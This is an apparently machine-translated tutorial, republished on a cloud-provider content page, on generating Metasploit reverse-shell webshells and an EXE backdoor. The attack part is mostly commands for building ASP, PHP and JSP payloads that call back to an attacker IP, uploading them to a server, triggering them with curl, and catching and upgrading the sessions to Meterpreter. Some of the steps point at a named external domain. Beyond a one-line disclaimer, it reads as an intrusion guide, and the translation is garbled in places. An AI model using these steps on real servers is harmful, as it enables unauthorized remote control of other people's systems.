Metasploit's Webshell of the right to raise

Source: Internet
Author: User
Tags curl sessions

The methods involved in this article can only be tested on authorized machines.
First of all, I suggest that we check the usage of Meterpreter on the Internet. Read this article to understand why you should use MSF Laiti (because there is a meterpreter in MSF that is powerful ^_^)
Metasploit owns both Msfpayload and Msfencode tools, both of which can generate an EXE-type backdoor, a Webshell that generates web script types, and then sets up the listener by generating Webshell, Access to the Webshell URL, if you are lucky, you can generate a session for further use.
The following are the specific ways to use them.
We can look at the payload in MSF and then remember where they are: using the following instructions to produce a webshell similar to the one in front of Msfpayload, except that a Web script file is generated here:
Produce Webshell
Msfpayload windows/meterpreter/reverse_tcp Lhost=your_ip | Msfencode-t Asp-o webshell.asp
Then upload the Webshell to the server (this step will have upload permissions.) )
and start Msfconsole.
Enter use Exploit/multi/handler,
Set PAYLOAD windows/meterpreter/reverse_tcp (the PAYLOAD here will be the same as the one in front of the msfpayload.)
Set Lhost your_ip,
Execute exploit,
Then access the Webshell URL, where you can use curl to access curl http://host/webshell.asp, and if exploit executes successfully, you will see that Msfconsole has returned to the Meterpreter shell, If Meterpreter does not use the Internet to check, a lot.
But I use Netbox to build an ASP environment always error, I hope that the reader in the actual validation is not a mistake before using.
This produces an ASP Webshell can also produce PHP webshell,jsp Webshell need to specify the script type with the-t parameter when Msfencode, I think the PHP type of Webshell is more likely to succeed.

In addition, if the acquisition server has the ability to upload and execute upload files, you can upload a msfpayload generated back door, set up listening, and then perform the back door, return a session and then turn the session to Meterpreter, This makes it easy to use meter various features. Give a step: (The premise is above and explained)
1, msfpayload windows/meterpreter/reverse_tcp lhost=192.168.130.131 lport=4444 X >/root/helen.exe
2, open the Msfconsole (another open terminate terminal)
3, set up monitoring (listening to the word seems very advanced, do not be intimidated by it): Use Exploit/multi/handler,set PAYLOAD windows/meterpreter/reverse_tcp,set lhost=your_ip, Set Lport 4444, performing exploit
4, upload the test.exe to the server
5, execute test.exe on the server can return a shell.
6, the Windows shell into Meterpreter Shell: Because the use of payload is SHELL_REVERSE_TCP, see the name of the return of a shell, can be seen in the listener returned a Windows Shell (Windows command Prompt), rather than a meterpreter shell, which is about to be converted by pressing CTRL + Z to run the Windows shell background, and then sessions instructions to see how the shell session is going
, and then execute sessions-u number, which is the Windows shell session you found. This creates a meterpreter shell that can take advantage of Meterpreter's powerful capabilities. There may also be errors, look at the error messages and copy some of the Google.
Perhaps readers have some questions: since you can upload exe file, why use MSF, directly upload a powerful Trojan is not more convenient. I would say because there is a strong meterpreter in MSF.
Summary, you can play to imagine, try payloads some payloads can not be used, may have unexpected discoveries.


When Linux does not bounce back, it's often the case for MSF.

1. Generate Webshell Files
MSF > Msfpayload php/reverse_php lhost= your IP lport= port R > dis9.php
My BT4 is in the/root/catalogue and then dis9.php can run.
Get dis9.php into your shell, like www.dis9.com/dis9.php.



2. MSF then sets interface templates and parameters
MSF > Use Multi/handler//Enter Multi/handler interface
MSF exploit (handler) > Set PAYLOAD php/reverse_php//write module is not clear can first info php/reverse_php look at the introduction
MSF exploit (handler) > set Lhost your IP//generate dis9.php lhost IP is the same as your IP
MSF exploit (handler) > Set lport 8080/ibid.
MSF exploit (handler) > Exploit//Executive



3. Bounce Shell
And then visit your dis9.php.
Root@bt4:links www.dis9.com/dis9.php
This will bounce off a shell
We can continue fuck all

/////////////////////////////////////////////////////////////////////////////////////////////////
Jsp
Msfpayload java/jsp_shell_reverse_tcp lhost=192.168.10.1 R > balckrootkit.jsp
MSF > Use Exploit/multi/handler
MSF exploit (handler) > Set PAYLOAD java/jsp_shell_reverse_tcp
Set PAYLOAD java/jsp_shell_reverse_tcp
MSF exploit (handler) > Set Lhost 192.168.10.1
Lhost => 192.168.10.1
——————————————————-
There is no set port default of 4444

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.